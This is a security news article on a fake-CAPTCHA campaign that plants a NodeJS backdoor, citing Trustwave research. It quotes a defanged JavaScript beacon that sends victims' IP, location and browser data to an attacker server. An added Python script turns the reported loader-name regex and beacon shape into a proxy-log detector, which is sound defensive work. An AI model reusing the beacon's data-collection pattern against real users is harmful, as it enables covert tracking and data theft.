Advanced Malware Campaign Implants a NodeJS Backdoor via Fake CAPTCHAs
The article describes a new malware campaign in which attackers infect user systems through a disguised CAPTCHA page and a NodeJS backdoor. Social engineering lures users to compromised websites, where injected malicious code executes PowerShell commands that install the backdoor. The backdoor provides system reconnaissance, command execution and data exfiltration, and maintains persistence through encrypted communications and registry modifications. Researchers note that these attack techniques are growing more sophisticated and have high success rates, so similar threats warrant vigilance. 2025-5-2 12:2:29 Author: cybersecuritynews.com

New Stealthy NodeJS Backdoor Infects Users via CAPTCHA Verifications

A sophisticated malware campaign has emerged that deploys stealthy NodeJS backdoors through deceptive CAPTCHA verification screens, security researchers revealed today.

This campaign represents a growing trend of threat actors exploiting seemingly legitimate security measures to distribute malicious code, targeting users who are accustomed to completing CAPTCHA challenges during their regular online activities.

The attack begins when users visit compromised websites, often accessed through social media links or search results.


These sites contain injected malicious code that loads JavaScript files, eventually leading victims to fake CAPTCHA verification pages.

When users attempt to complete these CAPTCHA challenges, malicious PowerShell commands are covertly executed in the background, installing a NodeJS-based backdoor that provides attackers with persistent access to the victim’s system.

Trustwave SpiderLabs researchers identified this threat during an Advanced Continual Threat Hunt conducted in early March 2025.

Their analysis revealed that this malware campaign is part of the broader KongTuke activity cluster, which has been active since September 2024.

The campaign has shown a notable level of sophistication, with attackers continuously updating their tactics to evade detection.

“Given the effectiveness and high success rates of fake CAPTCHA techniques as an initial access vector compared to traditional methods, we anticipate continued growth and prevalence of these tactics,” noted the Trustwave report.

Fake CAPTCHA emulation (Source – Trustwave)

The researchers also observed a resurgence in similar NodeJS-based backdoor deployments across multiple malware campaigns, including KongTuke, Fake CAPTCHA schemes, Mispadu, and Lumma stealers.

The backdoor, dubbed YaNB (Yet Another NodeJS Backdoor), demonstrates advanced capabilities including system reconnaissance, command execution, and data exfiltration.

Once installed, it establishes a connection to attacker-controlled infrastructure and remains in a passive state awaiting further commands, which facilitates the deployment of additional malicious components.

Infection Mechanism: From Compromised Sites to Node.js RAT

The infection chain begins with compromised websites containing injected JavaScript code.

These scripts follow a specific naming pattern identified by researchers: a four-character sequence with alternating numbers and lowercase letters (“1q2w.js”), matching the regular expression pattern “\d[a-z]\d[a-z].js”.

When users visit these compromised sites, the injected script performs initial reconnaissance by collecting system information including operating system details, IP address, browser type, and geolocation data.

This information is then base64-encoded and sent to the command and control server as query parameters of a request like the following:

"hxxps://[.]com/js.php?" +
"device=" + os +
"&ip=" + btoa(ipData.ip) +
"&referrer=" + btoa(url) +
"&browser=" + btoa(browser) +
"&ua=" + btoa(userAgent) +
"&domain=" + btoa("hxxps://[.]com") +
"&loc=" + btoa(ipData.loc) +
"&is_ajax=1"
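The two observable artifacts described above (the loader script naming pattern and the base64-encoded reconnaissance beacon to js.php) are what a defender would hunt for in web proxy logs. The following script is an added example, not code from the article or from Trustwave: it matches script file names against the reported regular expression and decodes the beacon's query parameters back into the collected fields. The proxy log format (timestamp, client, method, URL, status), the domain names and the log contents are all constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlparse

# Name pattern reported for the injected loader scripts (e.g. "1q2w.js"); the dot is escaped here.
LOADER_NAME_RE = re.compile(r"^\d[a-z]\d[a-z]\.js$")

# Query fields the observed beacon encodes with btoa(); "device" is sent in clear text.
B64_FIELDS = ("ip", "referrer", "browser", "ua", "domain", "loc")


def is_loader_script_url(url):
    """True when the URL's file name matches the reported loader naming pattern."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    return LOADER_NAME_RE.match(name) is not None


def _b64_lenient(value):
    """Decode btoa() output that was concatenated raw into a URL.

    parse_qs turns '+' into a space, and padding may have been stripped in transit,
    so both are repaired before decoding; returns None if it is still not base64.
    """
    value = value.replace(" ", "+")
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def decode_beacon(url):
    """Return the decoded reconnaissance fields if the URL has the beacon's shape, else None."""
    parsed = urlparse(url)
    qs = parse_qs(parsed.query, keep_blank_values=True)
    # Shape check: js.php endpoint, the is_ajax=1 marker and the clear-text device field.
    if not parsed.path.endswith("/js.php") or qs.get("is_ajax") != ["1"] or "device" not in qs:
        return None
    fields = {"device": qs["device"][0]}
    for name in B64_FIELDS:
        fields[name] = _b64_lenient(qs[name][0]) if name in qs else None
    return fields


def scan_proxy_log(lines):
    """Return (timestamp, client, kind, detail) findings for a whitespace-separated proxy log."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, url = parts[0], parts[1], parts[3]
        if is_loader_script_url(url):
            findings.append((ts, client, "loader-script", url))
        beacon = decode_beacon(url)
        if beacon is not None:
            findings.append((ts, client, "recon-beacon", beacon))
    return findings


def _b64(text):
    """Same encoding btoa() applies, used only to build the constructed sample below."""
    return base64.b64encode(text.encode()).decode()


# Constructed sample log (timestamp, client, method, URL, status). The hostnames are
# placeholders; the beacon values are base64-encoded exactly as the observed snippet does.
SAMPLE_LOG = [
    "2025-03-05T10:12:01Z 10.0.0.5 GET https://compromised.example/wp-content/1q2w.js 200",
    (
        "2025-03-05T10:12:02Z 10.0.0.5 GET https://c2.example/js.php?device=Windows"
        + "&ip=" + _b64("203.0.113.7")
        + "&referrer=" + _b64("https://compromised.example/")
        + "&browser=" + _b64("Chrome")
        + "&ua=" + _b64("Mozilla/5.0")
        + "&domain=" + _b64("https://c2.example")
        + "&loc=" + _b64("51.5,-0.1")
        + "&is_ajax=1 200"
    ),
    "2025-03-05T10:12:03Z 10.0.0.6 GET https://cdn.example/jquery.min.js 200",
]

if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_LOG):
        print(finding)
```

The loader name check alone will produce false positives on benign four-character script names, so it is best used as a pivot: a client that fetches such a script and shortly afterwards sends a js.php request carrying base64-encoded ip, referrer and ua fields is a much stronger signal than either event on its own.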

Following this initial reconnaissance, the C2 server responds with the fake CAPTCHA challenge code.

The user, believing they are completing a legitimate security verification, triggers a PowerShell command that downloads and installs Node.js and executes the backdoor.

This backdoor employs sophisticated anti-VM techniques to evade analysis, checking for system characteristics that might indicate a virtual environment, such as memory size and computer name patterns.

The NodeJS backdoor uses a custom XOR-based encryption mechanism for command and control communications and establishes persistence through registry modifications, disguising itself as a legitimate browser update service.

Once fully operational, the malware can deploy additional payloads, including more advanced NodeJS RATs capable of tunneling malicious traffic through SOCKS5 proxies.

As this campaign continues to evolve, organizations and users should remain vigilant when encountering CAPTCHA challenges, particularly on less familiar websites.



Source: https://cybersecuritynews.com/new-stealthy-nodejs-backdoor-infects-users/